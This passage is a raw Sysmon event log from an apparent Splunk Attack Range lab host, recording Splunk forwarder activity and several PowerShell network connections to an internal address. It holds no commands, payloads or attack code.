15:01:35.541{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52463-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:11.921{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=974583519C36EF465CA76300391DFB07,SHA256=F6BACF7499685BE7482BE565772F4A7950F6726BE58337576202A3D2ECBF8D93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:12.921{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9892B3D83B6015FECB07BD29B4405CAA,SHA256=4BD6BFF9F1B0A8975A0F52CD59C72C821511717C44195FE44209748DD4F1AB56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:13.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=742309F267519AFF4F02513B4B40EFE0,SHA256=F3FA15051A4B3CF455E468AA09E14CA11D13CD9C1236B72D89F63FB2CCB9E061,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:13.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0300B18FF9A314A174693835323A4BAE,SHA256=BDC0B04B10C8718F431ABF6BC6DF91E4DB1B04C3C75E3E4E5C917B6E6A8AE120,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:38.255{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52464-false10.0.1.12-8000- 23542300x800000000000000035342769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:14.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8CA69CD89F801932DEA1FED5E88DE0F,SHA256=803E06DB64FB171A06C4AB747F51C9B0EB2D2EDF53CC5E9C5919E002ACB4CBE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:39.555{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52465-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:15.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D46C39717AE791D034E42F2923E709,SHA256=0CF9FD4E9B4A8D53A548C3A7BC1048FBD2AE01E0E7E68DF1FD4261F6CE2CE8B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-733D-613B-40B4-03000000C801}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-733D-613B-40B4-03000000C801}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.404{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-733D-613B-40B4-03000000C801}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.389{B81B27B7-733D-613B-40B4-03000000C801}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.020{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8419B3E0E42FE389A562E0EA3DBAD12,SHA256=C85B35418924A65026188F2AFB00E70589596ECD9634CB3F8DCEF63441F9894B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:44.121{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52466-false10.0.1.12-8000- 23542300x800000000000000035342791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5980FD26E2323C35272208A43BC2FE7B,SHA256=269DEB9FBC9F85B5DD5F3B305B9A2A240E175A39072012E66D43DFCEEE606550,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED3A782D0BBE4C886336B051716602DE,SHA256=4E44B499784027658E2F71A0D5F478FF94CE0F7F9D4CD0531294550208616CF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.256{B81B27B7-733E-613B-41B4-03000000C801}2464920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-733E-613B-41B4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-733E-613B-41B4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.087{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-733E-613B-41B4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.072{B81B27B7-733E-613B-41B4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:18.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBC487DC8FE7C32A0005472F75086C02,SHA256=8996CE19D81ED2CFF98AFE0625376EA76678EA41CDCAABCD240B093E1A3F4DC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:19.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5E9B7C42D1C39ED12A6447D48E98DB12,SHA256=BAF1A0DC4B692BDDD0D0A6F653EFE8A39C28D7A5BF8BDA88AB17F7D1CC57D4AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:19.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8941BB9A68078D15AB1EB455009FC1,SHA256=C77756B41A6F84504FE7D562C6C08B55FC11B01ACC5E4698753155687DD6FA8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:45.573{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52467-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:20.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=329429C858356B8F855A93414E79D69A,SHA256=72D2C36639E2E93D846B39361F7402371EAFC4488AFE70E06BBC4B804B8FEDEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:21.134{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCEB68CA0E15E48F8863FF3E7BE4EDBF,SHA256=E89102C5139727F3B9206A5C19BBB3BB94A9635963891238B452AD8BC8541B7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:22.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03E53ACF663E4A8F5EF6BDA2CE8F5A6A,SHA256=B3AD368B315A23EE64381F26119AE7B473B6F0262DCD8417E4EF89976D6C6E2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:49.151{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52468-false10.0.1.12-8000- 23542300x800000000000000035342800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:23.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E71C016DF041D26338608FDB13C81669,SHA256=CC6454DB5B9A3294B3FCB8D2862DE4323805163BF6260E27802552F374079C07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:23.070{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program 